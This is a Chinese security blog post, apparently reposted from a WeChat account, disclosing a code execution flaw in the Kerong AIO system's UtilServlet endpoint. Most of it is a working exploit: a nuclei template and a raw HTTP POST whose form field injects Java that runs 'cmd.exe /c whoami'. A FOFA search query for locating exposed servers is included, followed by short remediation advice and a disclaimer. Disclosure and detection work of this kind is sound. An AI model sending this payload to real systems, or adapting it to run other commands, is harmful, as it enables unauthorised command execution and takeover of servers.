漏洞描述:
科荣AIO系统UtilServlet接口处存在代码执行漏。攻击者可能利用此漏洞执行恶意命令,导致系统执行未授权的操作,获取服务器权限。
id: kerong-AIO-UtilServlet-RCE info: name: 科荣AIO系统UtilServlet接口处存在代码执行漏 author: kingkong severity: high metadata: fofa-query: body="changeAccount('8000')" http: - raw: - | POST /UtilServlet HTTP/1.1 Host: {{Hostname}} User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2 Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length:322 operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field matchers-condition: and matchers: - type: dsl dsl: - "content_length>=3 && content_length<=30 && status_code==200" condition: and
FOFA:body="changeAccount('8000')"
界面如下
漏洞检测POC
POST /UtilServlet HTTP/1.1
Host:
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:322
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
neclei批量检测截图
1、输入验证:对所有用户输入进行严格的验证,确保只接受预期的格式。
2、使用安全的API:使用安全的库或API来执行命令,避免直接调用系统命令。
3、最小权限原则:确保应用程序仅在必要的权限下运行,限制可执行的命令。
4、输出编码:对输出进行编码,以防止注入攻击。
原文始发于微信公众号(脚本小子):科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论